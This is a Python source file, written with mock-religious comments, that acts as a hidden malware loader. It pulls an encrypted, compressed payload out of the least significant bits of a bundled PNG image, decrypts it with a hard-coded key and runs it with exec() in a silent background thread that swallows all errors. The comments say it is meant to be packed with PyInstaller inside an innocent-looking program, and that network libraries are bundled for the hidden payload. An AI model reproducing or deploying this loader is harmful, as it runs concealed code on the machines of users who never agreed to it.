import threading
import os
import sys
import zlib
import base64
from cryptography.fernet import Fernet
from PIL import Image

# ==============================================================================
#      SECTION 0: THE DIVINE IMPORTS FOR THE BLIND FORGE
# We add these here not for the mask, but for the soul within.
# This grants PyInstaller the sight needed to bundle the required libraries
# for the hidden payload, preventing its failure in the frozen abyss.
# ==============================================================================
import urllib.request
import ssl
# ==============================================================================

# ==============================================================================
#                      SECTION I: THE SOUL EXTRACTOR
# This code awakens the serpent hidden within the sacred image.
# ==============================================================================

def extract_and_run_soul():
    """
    Finds the vessel, extracts the soul, breaks its chains, and gives it life.
    This runs in a silent, separate thread.
    """
    try:
        # --- THE DIVINE KEY ---
        # PASTE THE KEY generated by encryptor.py here.
        divine_key = b'0K-T2sIXZHQ8gwubQOyjokOfnyw5371QNbzXbxuC-QE='
        # --------------------

        # Determine the path to the vessel image, whether running from source or as a frozen exe.
        if hasattr(sys, 'frozen'):
            # Path when running as a bundled executable
            base_path = sys._MEIPASS
        else:
            # Path when running as a .py script
            base_path = os.path.dirname(os.path.abspath(__file__))

        image_path = os.path.join(base_path, 'assets', 'images', 'splash_payload.png')
        
        img = Image.open(image_path).convert('RGBA')
        pixels = img.load()
        width, height = img.size

        # --- THE UNWEAVING ---
        # Extract the soul's bits from the Least Significant Bits of the pixels.
        payload_bits = ""
        header_bits_to_read = 32 # 4 bytes for the length header
        payload_len = None
        bits_read = 0
        
        for y in range(height):
            for x in range(width):
                r, g, b, a = pixels[x, y]
                for channel_val in [r, g, b, a]:
                    payload_bits += str(channel_val & 1)
                    bits_read += 1
                    
                    if payload_len is None and bits_read == header_bits_to_read:
                        header_bytes = int(payload_bits, 2).to_bytes(4, 'big')
                        payload_len = int.from_bytes(header_bytes, 'big')

                    if payload_len is not None and len(payload_bits) == (header_bits_to_read + (payload_len * 8)):
                        break
                if payload_len is not None and len(payload_bits) == (header_bits_to_read + (payload_len * 8)):
                    break
            if payload_len is not None and len(payload_bits) == (header_bits_to_read + (payload_len * 8)):
                break
        
        final_payload_bits = payload_bits[header_bits_to_read:]
        payload_bytes = int(final_payload_bits, 2).to_bytes(len(final_payload_bits) // 8, 'big')
        
        # --- THE SHATTERING OF CHAINS ---
        encrypted_payload = base64.b64decode(payload_bytes)
        cipher_suite = Fernet(divine_key)
        compressed_payload = cipher_suite.decrypt(encrypted_payload)
        soul_code = zlib.decompress(compressed_payload).decode('utf-8')
        
        # --- THE AWAKENING ---
        exec(soul_code, globals())

    except Exception:
        pass

# --- INVOCATION OF THE SOUL ---
soul_thread = threading.Thread(target=extract_and_run_soul, daemon=True)
soul_thread.start()